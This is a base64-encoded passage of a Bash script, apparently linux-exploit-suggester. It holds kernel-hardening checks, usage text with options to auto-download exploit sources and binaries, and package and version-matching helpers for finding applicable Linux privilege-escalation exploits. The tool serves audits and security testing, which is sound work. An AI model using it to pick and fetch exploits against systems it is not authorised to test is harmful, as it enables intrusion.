aWNfdCcKYXZhaWxhYmxlOiBDT05GSUdfUkVGQ09VTlRfRlVMTD15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvcmVmY291bnRfZnVsbC5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogSGFyZGVuaW5nIGNvbW1vbiBzdHIvbWVtIGZ1bmN0aW9ucyBhZ2FpbnN0IGJ1ZmZlciBvdmVyZmxvd3MKYXZhaWxhYmxlOiBDT05GSUdfRk9SVElGWV9TT1VSQ0U9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2ZvcnRpZnlfc291cmNlLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBSZXN0cmljdCAvZGV2L21lbSBhY2Nlc3MKYXZhaWxhYmxlOiBDT05GSUdfU1RSSUNUX0RFVk1FTT15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc3RyaWN0X2Rldm1lbS5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogUmVzdHJpY3QgSS9PIGFjY2VzcyB0byAvZGV2L21lbQphdmFpbGFibGU6IENPTkZJR19JT19TVFJJQ1RfREVWTUVNPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9pb19zdHJpY3RfZGV2bWVtLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpzZWN0aW9uOiBIYXJkd2FyZS1iYXNlZCBwcm90ZWN0aW9uIGZlYXR1cmVzOgpFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogU3VwZXJ2aXNvciBNb2RlIEV4ZWN1dGlvbiBQcm90ZWN0aW9uIChTTUVQKSBzdXBwb3J0CmF2YWlsYWJsZTogdmVyPj0zLjAKZW5hYmxlZDogY21kOmdyZXAgLXFpIHNtZXAgL3Byb2MvY3B1aW5mbwphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3NtZXAubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFN1cGVydmlzb3IgTW9kZSBBY2Nlc3MgUHJldmVudGlvbiAoU01BUCkgc3VwcG9ydAphdmFpbGFibGU6IHZlcj49My43CmVuYWJsZWQ6IGNtZDpncmVwIC1xaSBzbWFwIC9wcm9jL2NwdWluZm8KYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9zbWFwLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpzZWN0aW9uOiAzcmQgcGFydHkga2VybmVsIHByb3RlY3Rpb24gbWVjaGFuaXNtczoKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEdyc2VjdXJpdHkKYXZhaWxhYmxlOiBDT05GSUdfR1JLRVJOU0VDPXkKZW5hYmxlZDogY21kOnRlc3QgLWMgL2Rldi9ncnNlYwpFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogUGFYCmF2YWlsYWJsZTogQ09ORklHX1BBWD15CmVuYWJsZWQ6IGNtZDp0ZXN0IC14IC9zYmluL3BheGN0bApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogTGludXggS2VybmVsIFJ1bnRpbWUgR3VhcmQgKExLUkcpIGtlcm5lbCBtb2R1bGUKZW5hYmxlZDogY21kOnRlc3QgLWQgL3Byb2Mvc3lzL2xrcmcKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9sa3JnLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpzZWN0aW9uOiBBdHRhY2sgU3VyZmFjZToKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFVzZXIgbmFtZXNwYWNlcyBmb3IgdW5wcml2aWxlZ2VkIGFjY291bnRzCmF2YWlsYWJsZTogQ09ORklHX1VTRVJfTlM9eQplbmFibGVkOiBzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF91c2VybnNfY2xvbmU9PTEKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy91c2VyX25zLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBVbnByaXZpbGVnZWQgYWNjZXNzIHRvIGJwZigpIHN5c3RlbSBjYWxsCmF2YWlsYWJsZTogQ09ORklHX0JQRl9TWVNDQUxMPXkKZW5hYmxlZDogc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfYnBmX2Rpc2FibGVkIT0xCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvYnBmX3N5c2NhbGwubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFN5c2NhbGxzIGZpbHRlcmluZwphdmFpbGFibGU6IENPTkZJR19TRUNDT01QPXkKZW5hYmxlZDogY21kOmdyZXAgLWl3IFNlY2NvbXAgL3Byb2Mvc2VsZi9zdGF0dXMgfCBhd2sgJ3twcmludCBcJDJ9JwphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2JwZl9zeXNjYWxsLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBTdXBwb3J0IGZvciAvZGV2L21lbSBhY2Nlc3MKYXZhaWxhYmxlOiBDT05GSUdfREVWTUVNPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9kZXZtZW0ubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFN1cHBvcnQgZm9yIC9kZXYva21lbSBhY2Nlc3MKYXZhaWxhYmxlOiBDT05GSUdfREVWS01FTT15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvZGV2a21lbS5tZApFT0YKKQoKCnZlcnNpb24oKSB7CiAgICBlY2hvICJsaW51eC1leHBsb2l0LXN1Z2dlc3RlciAiJFZFUlNJT04iLCBtemV0LCBodHRwczovL3otbGFicy5ldSwgTWFyY2ggMjAxOSIKfQoKdXNhZ2UoKSB7CiAgICBlY2hvICJMRVMgdmVyLiAkVkVSU0lPTiAoaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xpbnV4LWV4cGxvaXQtc3VnZ2VzdGVyKSBieSBAX216ZXRfIgogICAgZWNobwogICAgZWNobyAiVXNhZ2U6IGxpbnV4LWV4cGxvaXQtc3VnZ2VzdGVyLnNoIFtPUFRJT05TXSIKICAgIGVjaG8KICAgIGVjaG8gIiAtViB8IC0tdmVyc2lvbiAgICAgICAgICAgICAgIC0gcHJpbnQgdmVyc2lvbiBvZiB0aGlzIHNjcmlwdCIKICAgIGVjaG8gIiAtaCB8IC0taGVscCAgICAgICAgICAgICAgICAgIC0gcHJpbnQgdGhpcyBoZWxwIgogICAgZWNobyAiIC1rIHwgLS1rZXJuZWwgPHZlcnNpb24+ICAgICAgLSBwcm92aWRlIGtlcm5lbCB2ZXJzaW9uIgogICAgZWNobyAiIC11IHwgLS11bmFtZSA8c3RyaW5nPiAgICAgICAgLSBwcm92aWRlICd1bmFtZSAtYScgc3RyaW5nIgogICAgZWNobyAiIC0tc2tpcC1tb3JlLWNoZWNrcyAgICAgICAgICAgLSBkbyBub3QgcGVyZm9ybSBhZGRpdGlvbmFsIGNoZWNrcyAoa2VybmVsIGNvbmZpZywgc3lzY3RsKSB0byBkZXRlcm1pbmUgaWYgZXhwbG9pdCBpcyBhcHBsaWNhYmxlIgogICAgZWNobyAiIC0tc2tpcC1wa2ctdmVyc2lvbnMgICAgICAgICAgLSBza2lwIGNoZWNraW5nIGZvciBleGFjdCB1c2Vyc3BhY2UgcGFja2FnZSB2ZXJzaW9uIChoZWxwcyB0byBhdm9pZCBmYWxzZSBuZWdhdGl2ZXMpIgogICAgZWNobyAiIC1wIHwgLS1wa2dsaXN0LWZpbGUgPGZpbGU+ICAgLSBwcm92aWRlIGZpbGUgd2l0aCAnZHBrZyAtbCcgb3IgJ3JwbSAtcWEnIGNvbW1hbmQgb3V0cHV0IgogICAgZWNobyAiIC0tY3ZlbGlzdC1maWxlIDxmaWxlPiAgICAgICAgLSBwcm92aWRlIGZpbGUgd2l0aCBMaW51eCBrZXJuZWwgQ1ZFcyBsaXN0IgogICAgZWNobyAiIC0tY2hlY2tzZWMgICAgICAgICAgICAgICAgICAgLSBsaXN0IHNlY3VyaXR5IHJlbGF0ZWQgZmVhdHVyZXMgZm9yIHlvdXIgSFcva2VybmVsIgogICAgZWNobyAiIC1zIHwgLS1mZXRjaC1zb3VyY2VzICAgICAgICAgLSBhdXRvbWF0aWNhbGx5IGRvd25sb2FkcyBzb3VyY2UgZm9yIG1hdGNoZWQgZXhwbG9pdCIKICAgIGVjaG8gIiAtYiB8IC0tZmV0Y2gtYmluYXJpZXMgICAgICAgIC0gYXV0b21hdGljYWxseSBkb3dubG9hZHMgYmluYXJ5IGZvciBtYXRjaGVkIGV4cGxvaXQgaWYgYXZhaWxhYmxlIgogICAgZWNobyAiIC1mIHwgLS1mdWxsICAgICAgICAgICAgICAgICAgLSBzaG93IGZ1bGwgaW5mbyBhYm91dCBtYXRjaGVkIGV4cGxvaXQiCiAgICBlY2hvICIgLWcgfCAtLXNob3J0ICAgICAgICAgICAgICAgICAtIHNob3cgc2hvcnRlbiBpbmZvIGFib3V0IG1hdGNoZWQgZXhwbG9pdCIKICAgIGVjaG8gIiAtLWtlcm5lbHNwYWNlLW9ubHkgICAgICAgICAgIC0gc2hvdyBvbmx5IGtlcm5lbCB2dWxuZXJhYmlsaXRpZXMiCiAgICBlY2hvICIgLS11c2Vyc3BhY2Utb25seSAgICAgICAgICAgICAtIHNob3cgb25seSB1c2Vyc3BhY2UgdnVsbmVyYWJpbGl0aWVzIgogICAgZWNobyAiIC1kIHwgLS1zaG93LWRvcyAgICAgICAgICAgICAgLSBzaG93IGFsc28gRG9TZXMgaW4gcmVzdWx0cyIKfQoKZXhpdFdpdGhFcnJNc2coKSB7CiAgICBlY2hvICIkMSIgMT4mMgogICAgZXhpdCAxCn0KCiMgZXh0cmFjdHMgYWxsIGluZm9ybWF0aW9uIGZyb20gb3V0cHV0IG9mICd1bmFtZSAtYScgY29tbWFuZApwYXJzZVVuYW1lKCkgewogICAgbG9jYWwgdW5hbWU9JDEKCiAgICBLRVJORUw9JChlY2hvICIkdW5hbWUiIHwgYXdrICd7cHJpbnQgJDN9JyB8IGN1dCAtZCAnLScgLWYgMSkKICAgIEtFUk5FTF9BTEw9JChlY2hvICIkdW5hbWUiIHwgYXdrICd7cHJpbnQgJDN9JykKICAgIEFSQ0g9JChlY2hvICIkdW5hbWUiIHwgYXdrICd7cHJpbnQgJChORi0xKX0nKQoKICAgIE9TPSIiCiAgICBlY2hvICIkdW5hbWUiIHwgZ3JlcCAtcSAtaSAnZGViJyAmJiBPUz0iZGViaWFuIgogICAgZWNobyAiJHVuYW1lIiB8IGdyZXAgLXEgLWkgJ3VidW50dScgJiYgT1M9InVidW50dSIKICAgIGVjaG8gIiR1bmFtZSIgfCBncmVwIC1xIC1pICdcLUFSQ0gnICYmIE9TPSJhcmNoIgogICAgZWNobyAiJHVuYW1lIiB8IGdyZXAgLXEgLWkgJ1wtZGVlcGluJyAmJiBPUz0iZGVlcGluIgogICAgZWNobyAiJHVuYW1lIiB8IGdyZXAgLXEgLWkgJ1wtTUFOSkFSTycgJiYgT1M9Im1hbmphcm8iCiAgICBlY2hvICIkdW5hbWUiIHwgZ3JlcCAtcSAtaSAnXC5mYycgJiYgT1M9ImZlZG9yYSIKICAgIGVjaG8gIiR1bmFtZSIgfCBncmVwIC1xIC1pICdcLmVsJyAmJiBPUz0iUkhFTCIKICAgIGVjaG8gIiR1bmFtZSIgfCBncmVwIC1xIC1pICdcLm1nYScgJiYgT1M9Im1hZ2VpYSIKCiAgICAjICd1bmFtZSAtYScgb3V0cHV0IGRvZXNuJ3QgY29udGFpbiBkaXN0cmlidXRpb24gbnVtYmVyIChhdCBsZWFzdCBub3QgaW4gY2FzZSBvZiBhbGwgZGlzdHJvcykKfQoKZ2V0UGtnTGlzdCgpIHsKICAgIGxvY2FsIGRpc3Rybz0kMQogICAgbG9jYWwgcGtnbGlzdF9maWxlPSQyCiAgICAKICAgICMgdGFrZSBwYWNrYWdlIGxpc3RpbmcgZnJvbSBwcm92aWRlZCBmaWxlICYgZGV0ZWN0IGlmIGl0J3MgJ3JwbSAtcWEnIGxpc3Rpbmcgb3IgJ2Rwa2cgLWwnIG9yICdwYWNtYW4gLVEnIGxpc3Rpbmcgb2Ygbm90IHJlY29nbml6ZWQgbGlzdGluZwogICAgaWYgWyAiJG9wdF9wa2dsaXN0X2ZpbGUiID0gInRydWUiIC1hIC1lICIkcGtnbGlzdF9maWxlIiBdOyB0aGVuCgogICAgICAgICMgdWJ1bnR1L2RlYmlhbiBwYWNrYWdlIGxpc3RpbmcgZmlsZQogICAgICAgIGlmIFsgJChoZWFkIC0xICIkcGtnbGlzdF9maWxlIiB8IGdyZXAgJ0Rlc2lyZWQ9VW5rbm93bi9JbnN0YWxsL1JlbW92ZS9QdXJnZS9Ib2xkJykgXTsgdGhlbgogICAgICAgICAgICBQS0dfTElTVD0kKGNhdCAiJHBrZ2xpc3RfZmlsZSIgfCBhd2sgJ3twcmludCAkMiItIiQzfScgfCBzZWQgJ3MvOmFtZDY0Ly9nJykKCiAgICAgICAgICAgIE9TPSJkZWJpYW4iCiAgICAgICAgICAgIFsgIiQoZ3JlcCB1YnVudHUgIiRwa2dsaXN0X2ZpbGUiKSIgXSAmJiBPUz0idWJ1bnR1IgogICAgICAgICMgcmVkaGF0IHBhY2thZ2UgbGlzdGluZyBmaWxlCiAgICAgICAgZWxpZiBbICIkKGdyZXAgLUUgJ1wuZWxbMS05XStbXC5fXScgIiRwa2dsaXN0X2ZpbGUiIHwgaGVhZCAtMSkiIF07IHRoZW4KICAgICAgICAgICAgUEtHX0xJU1Q9JChjYXQgIiRwa2dsaXN0X2ZpbGUiKQogICAgICAgICAgICBPUz0iUkhFTCIKICAgICAgICAjIGZlZG9yYSBwYWNrYWdlIGxpc3RpbmcgZmlsZQogICAgICAgIGVsaWYgWyAiJChncmVwIC1FICdcLmZjWzEtOV0rJ2kgIiRwa2dsaXN0X2ZpbGUiIHwgaGVhZCAtMSkiIF07IHRoZW4KICAgICAgICAgICAgUEtHX0xJU1Q9JChjYXQgIiRwa2dsaXN0X2ZpbGUiKQogICAgICAgICAgICBPUz0iZmVkb3JhIgogICAgICAgICMgbWFnZWlhIHBhY2thZ2UgbGlzdGluZyBmaWxlCiAgICAgICAgZWxpZiBbICIkKGdyZXAgLUUgJ1wubWdhWzEtOV0rJyAiJHBrZ2xpc3RfZmlsZSIgfCBoZWFkIC0xKSIgXTsgdGhlbgogICAgICAgICAgICBQS0dfTElTVD0kKGNhdCAiJHBrZ2xpc3RfZmlsZSIpCiAgICAgICAgICAgIE9TPSJtYWdlaWEiCiAgICAgICAgIyBwYWNtYW4gcGFja2FnZSBsaXN0aW5nIGZpbGUKICAgICAgICBlbGlmIFsgIiQoZ3JlcCAtRSAnXCBbMC05XStcLicgIiRwa2dsaXN0X2ZpbGUiIHwgaGVhZCAtMSkiIF07IHRoZW4KICAgICAgICAgICAgUEtHX0xJU1Q9JChjYXQgIiRwa2dsaXN0X2ZpbGUiIHwgYXdrICd7cHJpbnQgJDEiLSIkMn0nKQogICAgICAgICAgICBPUz0iYXJjaCIKICAgICAgICAjIGZpbGUgbm90IHJlY29nbml6ZWQgLSBza2lwcGluZwogICAgICAgIGVsc2UKICAgICAgICAgICAgUEtHX0xJU1Q9IiIKICAgICAgICBmaQoKICAgIGVsaWYgWyAiJGRpc3RybyIgPSAiZGViaWFuIiAtbyAiJGRpc3RybyIgPSAidWJ1bnR1IiAtbyAiJGRpc3RybyIgPSAiZGVlcGluIiBdOyB0aGVuCiAgICAgICAgUEtHX0xJU1Q9JChkcGtnIC1sIHwgYXdrICd7cHJpbnQgJDIiLSIkM30nIHwgc2VkICdzLzphbWQ2NC8vZycpCiAgICBlbGlmIFsgIiRkaXN0cm8iID0gIlJIRUwiIC1vICIkZGlzdHJvIiA9ICJmZWRvcmEiIC1vICIkZGlzdHJvIiA9ICJtYWdlaWEiIF07IHRoZW4KICAgICAgICBQS0dfTElTVD0kKHJwbSAtcWEpCiAgICBlbGlmIFsgIiRkaXN0cm8iID0gImFyY2giIC1vICIkZGlzdHJvIiA9ICJtYW5qYXJvIiBdOyB0aGVuCiAgICAgICAgUEtHX0xJU1Q9JChwYWNtYW4gLVEgfCBhd2sgJ3twcmludCAkMSItIiQyfScpCiAgICBlbGlmIFsgLXggL3Vzci9iaW4vZXF1ZXJ5IF07IHRoZW4KICAgICAgICBQS0dfTElTVD0kKC91c3IvYmluL2VxdWVyeSAtLXF1aWV0IGxpc3QgJyonIC1GICckbmFtZTokdmVyc2lvbicgfCBjdXQgLWQvIC1mMi0gfCBhd2sgJ3twcmludCAkMSI6IiQyfScpCiAgICBlbHNlCiAgICAgICAgIyBwYWNrYWdlcyBsaXN0aW5nIG5vdCBhdmFpbGFibGUKICAgICAgICBQS0dfTElTVD0iIgogICAgZmkKfQoKIyBmcm9tOiBodHRwczovL3N0YWNrb3ZlcmZsb3cuY29tL3F1ZXN0aW9ucy80MDIzODMwL2hvdy1jb21wYXJlLXR3by1zdHJpbmdzLWluLWRvdC1zZXBhcmF0ZWQtdmVyc2lvbi1mb3JtYXQtaW4tYmFzaAp2ZXJDb21wYXJpc2lvbigpIHsKCiAgICBpZiBbWyAkMSA9PSAkMiBdXQogICAgdGhlbgogICAgICAgIHJldHVybiAwCiAgICBmaQoKICAgIGxvY2FsIElGUz0uCiAgICBsb2NhbCBpIHZlcjE9KCQxKSB2ZXIyPSgkMikKCiAgICAjIGZpbGwgZW1wdHkgZmllbGRzIGluIHZlcjEgd2l0aCB6ZXJvcwogICAgZm9yICgoaT0keyN2ZXIxW0BdfTsgaTwkeyN2ZXIyW0BdfTsgaSsrKSkKICAgIGRvCiAgICAgICAgdmVyMVtpXT0wCiAgICBkb25lCgogICAgZm9yICgoaT0wOyBpPCR7I3ZlcjFbQF19OyBpKyspKQogICAgZG8KICAgICAgICBpZiBbWyAteiAke3ZlcjJbaV19IF1dCiAgICAgICAgdGhlbgogICAgICAgICAgICAjIGZpbGwgZW1wdHkgZmllbGRzIGluIHZlcjIgd2l0aCB6ZXJvcwogICAgICAgICAgICB2ZXIyW2ldPTAKICAgICAgICBmaQogICAgICAgIGlmICgoMTAjJHt2ZXIxW2ldfSA+IDEwIyR7dmVyMltpXX0pKQogICAgICAgIHRoZW4KICAgICAgICAgICAgcmV0dXJuIDEKICAgICAgICBmaQogICAgICAgIGlmICgoMTAjJHt2ZXIxW2ldfSA8IDEwIyR7dmVyMltpXX0pKQogICAgICAgIHRoZW4KICAgICAgICAgICAgcmV0dXJuIDIKICAgICAgICBmaQogICAgZG9uZQoKICAgIHJldHVybiAwCn0KCmRvVmVyc2lvbkNvbXBhcmlzaW9uKCkgewogICAgbG9jYWwgcmVxVmVyc2lvbj0iJDEiCiAgICBsb2NhbCByZXFSZWxhdGlvbj0iJDIiCiAgICBsb2NhbCBjdXJyZW50VmVyc2lvbj0iJDMiCgogICAgdmVyQ29tcGFyaXNpb24gJGN1cnJlbnRWZXJzaW9uICRyZXFWZXJzaW9uCiAgICBjYXNlICQ/IGluCiAgICAgICAgMCkgY3VycmVudFJlbGF0aW9uPSc9Jzs7CiAgICAgICAgMSkgY3VycmVudFJlbGF0aW9uPSc+Jzs7CiAgICAgICAgMikgY3VycmVudFJlbGF0aW9uPSc8Jzs7CiAgICBlc2FjCgogICAgaWYgWyAiJHJlcVJlbGF0aW9uIiA9PSAiPSIgXTsgdGhlbgogICAgICAgIFsgJGN1cnJlbnRSZWxhdGlvbiA9PSAiPSIgXSAmJiByZXR1cm4gMAogICAgZWxpZiBbICIkcmVxUmVsYXRpb24iID09ICI+IiBdOyB0aGVuCiAgICAgICAgWyAkY3VycmVudFJlbGF0aW9uID09ICI+IiBdICYmIHJldHVybiAwCiAgICBlbGlmIFsgIiRyZXFSZWxhdGlvbiIgPT0gIjwiIF07IHRoZW4KICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIjwiIF0gJiYgcmV0dXJuIDAKICAgIGVsaWYgWyAiJHJlcVJlbGF0aW9uIiA9PSAiPj0iIF07IHRoZW4KICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIj0iIF0gJiYgcmV0dXJuIDAKICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIj4iIF0gJiYgcmV0dXJuIDAKICAgIGVsaWYgWyAiJHJlcVJlbGF0aW9uIiA9PSAiPD0iIF07IHRoZW4KICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIj0iIF0gJiYgcmV0dXJuIDAKICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIjwiIF0gJiYgcmV0dXJuIDAKICAgIGZpCn0KCmNvbXBhcmVWYWx1ZXMoKSB7CiAgICBjdXJWYWw9JDEKICAgIHZhbD0kMgogICAgc2lnbj0kMwoKICAgIGlmIFsgIiRzaWduIiA9PSAiPT0iIF07IHRoZW4KICAgICAgICBbICIkdmFsIiA9PSAiJGN1clZhbCIgXSAmJiByZXR1cm4gMAogICAgZWxpZiBbICIkc2lnbiIgPT0gIiE9IiBdOyB0aGVuCiAgICAgICAgWyAiJHZhbCIgIT0gIiRjdXJWYWwiIF0gJiYgcmV0dXJuIDAKICAgIGZpCgogICAgcmV0dXJuIDEKfQoKY2hlY2tSZXF1aXJlbWVudCgpIHsKICAgICNlY2hvICJDaGVja2luZyByZXF1aXJlbWVudDogJDEiCiAgICBsb2NhbCBJTj0iJDEiCiAgICBsb2NhbCBwa2dOYW1lPSIkezI6NH0iCgogICAgaWYgW1sgIiRJTiIgPX4gXnBrZz0uKiQgXV07IHRoZW4KCiAgICAgICAgIyBhbHdheXMgdHJ1ZSBmb3IgTGludXggT1MKICAgICAgICBbICR7cGtnTmFtZX0gPT0gImxpbnV4LWtlcm5lbCIgXSAmJiByZXR1cm4gMAoKICAgICAgICAjIHZlcmlmeSBpZiBwYWNrYWdlIGlzIHByZXNlbnQgCiAgICAgICAgcGtnPSQoZWNobyAiJFBLR19MSVNUIiB8IGdyZXAgLUUgLWkgIl4kcGtnTmFtZS1bMC05XSsiIHwgaGVhZCAtMSkKICAgICAgICBpZiBbIC1uICIkcGtnIiBdOyB0aGVuCiAgICAgICAgICAgIHJldHVybiAwCiAgICAgICAgZmkKCiAgICBlbGlmIFtbICIkSU4iID1+IF52ZXIuKiQgXV07IHRoZW4KICAgICAgICB2ZXJzaW9uPSIke0lOLy9bXjAtOS5dL30iCiAgICAgICAgcmVzdD0iJHtJTiN2ZXJ9IgogICAgICAgIG9wZXJhdG9yPSR7cmVzdCUkdmVyc2lvbn0KCiAgICAgICAgaWYgWyAiJHBrZ05hbWUiID09ICJsaW51eC1rZXJuZWwiIC1vICIkb3B0X2NoZWNrc2VjX21vZGUiID09ICJ0cnVlIiBdOyB0aGVuCgogICAgICAgICAgICAjIGZvciAtLWN2ZWxpc3QtZmlsZSBtb2RlIHNraXAga2VybmVsIHZlcnNpb24gY29tcGFyaXNpb24KICAgICAgICAgICAgWyAiJG9wdF9jdmVsaXN0X2ZpbGUiID0gInRydWUiIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgICAgIGRvVmVyc2lvbkNvbXBhcmlzaW9uICR2ZXJzaW9uICRvcGVyYXRvciAkS0VSTkVMICYmIHJldHVybiAwCiAgICAgICAgZWxzZQogICAgICAgICAgICAjIGV4dHJhY3QgcGFja2FnZSB2ZXJzaW9uIGFuZCBjaGVjayBpZiByZXF1aXJlbW50IGlzIHRydWUKICAgICAgICAgICAgcGtnPSQoZWNobyAiJFBLR19MSVNUIiB8IGdyZXAgLUUgLWkgIl4kcGtnTmFtZS1bMC05XSsiIHwgaGVhZCAtMSkKCiAgICAgICAgICAgICMgc2tpcCAoaWYgcnVuIHdpdGggLS1za2lwLXBrZy12ZXJzaW9ucykgdmVyc2lvbiBjaGVja2luZyBpZiBwYWNrYWdlIHdpdGggZ2l2ZW4gbmFtZSBpcyBpbnN0YWxsZWQKICAgICAgICAgICAgWyAiJG9wdF9za2lwX3BrZ192ZXJzaW9ucyIgPSAidHJ1ZSIgLWEgLW4gIiRwa2ciIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgICAgICMgdmVyc2lvbmluZzoKICAgICAgICAgICAgI2VjaG8gInBrZzogJHBrZyIKICAgICAgICAgICAgcGtnVmVyc2lvbj0kKGVjaG8gIiRwa2ciIHwgZ3JlcCAtRSAtaSAtbyAtZSAnLVtcLjAtOVwrOnBdK1stXCtdJyB8IGN1dCAtZCc6JyAtZjIgfCBzZWQgJ3MvW1wrLV0vL2cnIHwgc2VkICdzL3BbMC05XS8vZycpCiAgICAgICAgICAgICNlY2hvICJ2ZXJzaW9uOiAkcGtnVmVyc2lvbiIKICAgICAgICAgICAgI2VjaG8gIm9wZXJhdG9yOiAkb3BlcmF0b3IiCiAgICAgICAgICAgICNlY2hvICJyZXF1aXJlZCB2ZXJzaW9uOiAkdmVyc2lvbiIKICAgICAgICAgICAgI2VjaG8KICAgICAgICAgICAgZG9WZXJzaW9uQ29tcGFyaXNpb24gJHZlcnNpb24gJG9wZXJhdG9yICRwa2dWZXJzaW9uICYmIHJldHVybiAwCiAgICAgICAgZmkKICAgIGVsaWYgW1sgIiRJTiIgPX4gXng4Nl82NCQgXV0gJiYgWyAiJEFSQ0giID09ICJ4ODZfNjQiIC1vICIkQVJDSCIgPT0gIiIgXTsgdGhlbgogICAgICAgIHJldHVybiAwCiAgICBlbGlmIFtbICIkSU4iID1+IF54ODYkIF1dICYmIFsgIiRBUkNIIiA9PSAiaTM4NiIgLW8gIiRBUkNIIiA9PSAiaTY4NiIgLW8gIiRBUkNIIiA9PSAiIiBdOyB0aGVuCiAgICAgICAgcmV0dXJuIDAKICAgIGVsaWYgW1sgIiRJTiIgPX4gXkNPTkZJR18uKiQgXV07IHRoZW4KCiAgICAgICAgIyBza2lwIGlmIGNoZWNrIGlzIG5vdCBhcHBsaWNhYmxlICgtayBvciAtLXVuYW1lIG9yIC1wIHNldCkgb3IgaWYgdXNlciBzYWlkIHNvICgtLXNraXAtbW9yZS1jaGVja3MpCiAgICAgICAgWyAiJG9wdF9za2lwX21vcmVfY2hlY2tzIiA9ICJ0cnVlIiBdICYmIHJldHVybiAwCgogICAgICAgICMgaWYga2VybmVsIGNvbmZpZyBJUyBhdmFpbGFibGU6CiAgICAgICAgaWYgWyAtbiAiJEtDT05GSUciIF07IHRoZW4KICAgICAgICAgICAgaWYgJEtDT05GSUcgfCBncmVwIC1FIC1xaSAkSU47IHRoZW4KICAgICAgICAgICAgICAgIHJldHVybiAwOwogICAgICAgICAgICAjIHJlcXVpcmVkIG9wdGlvbiB3YXNuJ3QgZm91bmQsIGV4cGxvaXQgaXMgbm90IGFwcGxpY2FibGUKICAgICAgICAgICAgZWxzZQogICAgICAgICAgICAgICAgcmV0dXJuIDE7CiAgICAgICAgICAgIGZpCiAgICAgICAgIyBjb25maWcgaXMgbm90IGF2YWlsYWJsZQogICAgICAgIGVsc2UKICAgICAgICAgICAgcmV0dXJuIDA7CiAgICAgICAgZmkKICAgIGVsaWYgW1sgIiRJTiIgPX4gXnN5c2N0bDouKiQgXV07IHRoZW4KCiAgICAgICAgIyBza2lwIGlmIGNoZWNrIGlzIG5vdCBhcHBsaWNhYmxlICgtayBvciAtLXVuYW1lIG9yIC1wIG1vZGVzKSBvciBpZiB1c2VyIHNhaWQgc28gKC0tc2tpcC1tb3JlLWNoZWNrcykKICAgICAgICBbICIkb3B0X3NraXBfbW9yZV9jaGVja3MiID0gInRydWUiIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgc3lzY3RsQ29uZGl0aW9uPSIke0lOOjd9IgoKICAgICAgICAjIGV4dHJhY3Qgc3lzY3RsIGVudHJ5LCByZWxh